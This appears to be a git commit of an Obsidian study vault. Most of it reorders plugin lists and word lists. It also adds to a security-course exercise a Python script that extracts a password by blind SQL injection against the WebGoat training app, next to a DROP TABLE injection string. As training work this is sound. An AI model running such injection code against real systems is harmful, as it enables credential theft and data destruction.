vault backup: 2023-04-17 11:35:04
This commit is contained in:
28
.obsidian/community-plugins.json
vendored
28
.obsidian/community-plugins.json
vendored
@@ -1,19 +1,23 @@
|
|||||||
[
|
[
|
||||||
"obsidian-livesync",
|
"obsidian-git",
|
||||||
"obsidian-excalidraw-plugin",
|
"obsidian-mind-map",
|
||||||
"table-editor-obsidian",
|
"table-editor-obsidian",
|
||||||
"calendar",
|
"calendar",
|
||||||
"code-block-copy",
|
"obsidian-advanced-slides",
|
||||||
"obsidian-dictionary-plugin",
|
|
||||||
"obsidian-dynamic-toc",
|
|
||||||
"cm-editor-syntax-highlight-obsidian",
|
"cm-editor-syntax-highlight-obsidian",
|
||||||
"obsidian-excel-to-markdown-table",
|
"code-block-copy",
|
||||||
"juggl",
|
|
||||||
"obsidian-languagetool-plugin",
|
|
||||||
"obsidian-mind-map",
|
|
||||||
"nldates-obsidian",
|
|
||||||
"obsidian-git",
|
|
||||||
"url-into-selection",
|
"url-into-selection",
|
||||||
|
"obsidian-dictionary-plugin",
|
||||||
|
"obsidian-languagetool-plugin",
|
||||||
|
"obsidian-image-toolkit",
|
||||||
"quick-latex",
|
"quick-latex",
|
||||||
"obsidian-plugin-toc"
|
"obsidian-excel-to-markdown-table",
|
||||||
|
"obsidian-icons-plugin",
|
||||||
|
"juggl",
|
||||||
|
"obsidian-plugin-toc",
|
||||||
|
"drawio-obsidian",
|
||||||
|
"obsidian-completr",
|
||||||
|
"execute-code",
|
||||||
|
"nldates-obsidian",
|
||||||
|
"obsidian-livesync"
|
||||||
]
|
]
|
||||||
@@ -3881,7 +3881,6 @@ DXL
|
|||||||
Daten
|
Daten
|
||||||
Datenbank
|
Datenbank
|
||||||
DROP
|
DROP
|
||||||
Drawing
|
|
||||||
xU
|
xU
|
||||||
xM
|
xM
|
||||||
xK
|
xK
|
||||||
@@ -4841,8 +4840,6 @@ prA
|
|||||||
pdfTeX
|
pdfTeX
|
||||||
phone
|
phone
|
||||||
praktisch
|
praktisch
|
||||||
plugin
|
|
||||||
parsed
|
|
||||||
Ic
|
Ic
|
||||||
IT
|
IT
|
||||||
Ir
|
Ir
|
||||||
@@ -5236,7 +5233,6 @@ and
|
|||||||
aktuelle
|
aktuelle
|
||||||
access
|
access
|
||||||
alles
|
alles
|
||||||
aaaaaaaaaaaaaaa
|
|
||||||
fb
|
fb
|
||||||
fVVvD
|
fVVvD
|
||||||
fh
|
fh
|
||||||
@@ -5947,7 +5943,6 @@ exestierende
|
|||||||
eine
|
eine
|
||||||
einem
|
einem
|
||||||
egal
|
egal
|
||||||
excalidraw
|
|
||||||
tj
|
tj
|
||||||
tg
|
tg
|
||||||
tt
|
tt
|
||||||
@@ -6174,9 +6169,6 @@ tJWLG
|
|||||||
true
|
true
|
||||||
tabelle
|
tabelle
|
||||||
test
|
test
|
||||||
tags
|
|
||||||
the
|
|
||||||
this
|
|
||||||
JFRO
|
JFRO
|
||||||
JG
|
JG
|
||||||
JL
|
JL
|
||||||
@@ -6752,7 +6744,6 @@ EZw
|
|||||||
EUj
|
EUj
|
||||||
EuQ
|
EuQ
|
||||||
Employee
|
Employee
|
||||||
EXCALIDRAW
|
|
||||||
lX
|
lX
|
||||||
ll
|
ll
|
||||||
lC
|
lC
|
||||||
@@ -8322,7 +8313,6 @@ MNG
|
|||||||
MiNi
|
MiNi
|
||||||
Myl
|
Myl
|
||||||
ModDate
|
ModDate
|
||||||
MORE
|
|
||||||
qO
|
qO
|
||||||
qj
|
qj
|
||||||
qG
|
qG
|
||||||
@@ -9111,7 +9101,6 @@ mma
|
|||||||
mKt
|
mKt
|
||||||
mkb
|
mkb
|
||||||
mDK
|
mDK
|
||||||
menu
|
|
||||||
dg
|
dg
|
||||||
dw
|
dw
|
||||||
de
|
de
|
||||||
@@ -9337,7 +9326,6 @@ das
|
|||||||
dafür
|
dafür
|
||||||
dass
|
dass
|
||||||
den
|
den
|
||||||
document
|
|
||||||
VV
|
VV
|
||||||
VA
|
VA
|
||||||
Vsm
|
Vsm
|
||||||
@@ -9550,7 +9538,6 @@ VHCh
|
|||||||
VbL
|
VbL
|
||||||
Version
|
Version
|
||||||
Verändert
|
Verändert
|
||||||
VIEW
|
|
||||||
SGN
|
SGN
|
||||||
Sg
|
Sg
|
||||||
SrEHO
|
SrEHO
|
||||||
@@ -9769,7 +9756,6 @@ SET
|
|||||||
Sales
|
Sales
|
||||||
Struktur
|
Struktur
|
||||||
Smith
|
Smith
|
||||||
Switch
|
|
||||||
rn
|
rn
|
||||||
rE
|
rE
|
||||||
rD
|
rD
|
||||||
@@ -10324,7 +10310,6 @@ OKh
|
|||||||
OdD
|
OdD
|
||||||
OFV
|
OFV
|
||||||
OQyO
|
OQyO
|
||||||
OPTIONS
|
|
||||||
cgl
|
cgl
|
||||||
cj
|
cj
|
||||||
content
|
content
|
||||||
|
|||||||
2
.obsidian/workspace.json
vendored
2
.obsidian/workspace.json
vendored
@@ -15,7 +15,7 @@
|
|||||||
"type": "markdown",
|
"type": "markdown",
|
||||||
"state": {
|
"state": {
|
||||||
"file": "Informationssicherheit/Ueb2/Ueb2.md",
|
"file": "Informationssicherheit/Ueb2/Ueb2.md",
|
||||||
"mode": "source",
|
"mode": "preview",
|
||||||
"source": false
|
"source": false
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -96,3 +96,47 @@ Smith'; DROP TABLE access_log; --
|
|||||||
|
|
||||||
### 2
|
### 2
|
||||||
|
|
||||||
|
```python
|
||||||
|
import json
|
||||||
|
import requests
|
||||||
|
|
||||||
|
def sql_injection_advance_5():
|
||||||
|
alphabet_index = 0
|
||||||
|
alphabet = 'abcdefghijklmnopqrstuvwxyz'
|
||||||
|
password_index = 0
|
||||||
|
password = ''
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
'Cookie': COOKIE,
|
||||||
|
}
|
||||||
|
|
||||||
|
while True:
|
||||||
|
payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index])
|
||||||
|
|
||||||
|
data = {
|
||||||
|
'username_reg': payload,
|
||||||
|
'email_reg': 'a@a',
|
||||||
|
'password_reg': 'a',
|
||||||
|
'confirm_password_reg': 'a'
|
||||||
|
}
|
||||||
|
|
||||||
|
r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = json.loads(r.text)
|
||||||
|
except:
|
||||||
|
print("Wrong JSESSIONID, find it by looking at your requests once logged in.")
|
||||||
|
return
|
||||||
|
|
||||||
|
if "already exists please try to register with a different username" not in response['feedback']:
|
||||||
|
alphabet_index += 1
|
||||||
|
if alphabet_index > len(alphabet) - 1:
|
||||||
|
return
|
||||||
|
else:
|
||||||
|
password += alphabet[alphabet_index]
|
||||||
|
print(password)
|
||||||
|
alphabet_index = 0
|
||||||
|
password_index += 1
|
||||||
|
|
||||||
|
sql_injection_advance_5()
|
||||||
|
```
|
||||||
Reference in New Issue
Block a user